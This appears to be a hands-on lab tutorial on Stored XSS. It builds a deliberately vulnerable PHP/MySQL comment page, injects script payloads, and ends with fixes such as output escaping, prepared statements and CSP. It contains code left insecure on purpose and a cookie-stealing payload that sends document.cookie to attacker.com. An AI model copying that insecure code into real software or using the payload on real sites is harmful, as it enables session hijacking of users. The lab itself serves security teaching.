Objective
Learn how to exploit Stored Cross-Site Scripting (XSS) vulnerabilities by injecting malicious scripts that execute when other users view the affected page.
Scenario
You are performing a security assessment on a community blog website that allows users to post comments under articles. Due to poor input validation, the comment section is vulnerable to Stored XSS, allowing attackers to inject malicious scripts. Your goal is to exploit this vulnerability and understand its potential impact.
Lab Setup
Prerequisites:
- Basic knowledge of HTML, PHP (or any backend language), and JavaScript.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
Database Setup
Open phpMyAdmin and create a new database:
CREATE DATABASE xss_lab;Use the database:
USE xss_lab;Create a comments table:
CREATE TABLE comments (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
comment TEXT NOT NULL
);PHP Script for Comment System
Create a file comments.php:
<?php
$conn = mysqli_connect("localhost", "root", "", "xss_lab");
if (isset($_POST['submit'])) {
$username = $_POST['username'];
$comment = $_POST['comment'];
$query = "INSERT INTO comments (username, comment) VALUES ('$username', '$comment')";
mysqli_query($conn, $query);
}
$result = mysqli_query($conn, "SELECT * FROM comments");
?>
<form method="POST" action="">
Username: <input type="text" name="username" required><br>
Comment: <textarea name="comment" required></textarea><br>
<button type="submit" name="submit">Post Comment</button>
</form>
<h2>Comments:</h2>
<?php while ($row = mysqli_fetch_assoc($result)) { ?>
<p><strong><?php echo $row['username']; ?>:</strong> <?php echo $row['comment']; ?></p>
<?php } ?>Running the Application
Start your Apache and MySQL servers.
Place comments.php in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/comments.php in your browser.
Exploitation Steps
Step 1: Injecting the XSS Payload
In the Username field, enter:
AttackerIn the Comment field, enter the payload:
<script>alert('XSS');</script>Click Post Comment.
Expected Result:
- When the page reloads or when any other user visits the comments page, an alert box with the message
'XSS'will appear.
Step 2: Understanding the Impact
Session Hijacking: An attacker could steal session cookies with:
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>Defacement: An attacker could modify the page’s appearance with:
<script>document.body.innerHTML='<h1>Hacked by Attacker!</h1>';</script>Malware Injection: Inject scripts that download malicious files.
Solution and Prevention
Problem Analysis
- User input is directly stored and displayed without sanitization.
Fixing the Vulnerability
Use HTML escaping to neutralize script tags:
<?php echo htmlspecialchars($row['comment']); ?>Alternatively, use Content Security Policy (CSP) to restrict script execution.
Implementing Prepared Statements
While XSS primarily exploits output handling, it’s good practice to also secure database inputs:
$stmt = $conn->prepare("INSERT INTO comments (username, comment) VALUES (?, ?)");
$stmt->bind_param("ss", $username, $comment);
$stmt->execute();Additional Protections
Input Validation: Allow only safe characters.
Content Security Policy (CSP): Add HTTP headers to restrict script sources.
Content-Security-Policy: default-src 'self'; script-src 'self';Testing After Fix
- Try injecting
<script>alert('XSS')</script>after implementinghtmlspecialchars. - Observe that the payload is rendered as plain text instead of executing.
Conclusion
In this lab, you exploited a Stored XSS vulnerability to inject malicious scripts that execute when other users view the affected page. You also explored the serious impacts of stored XSS, such as session hijacking and defacement, and learned mitigation techniques like output encoding, input validation, and implementing security headers.
0 Comments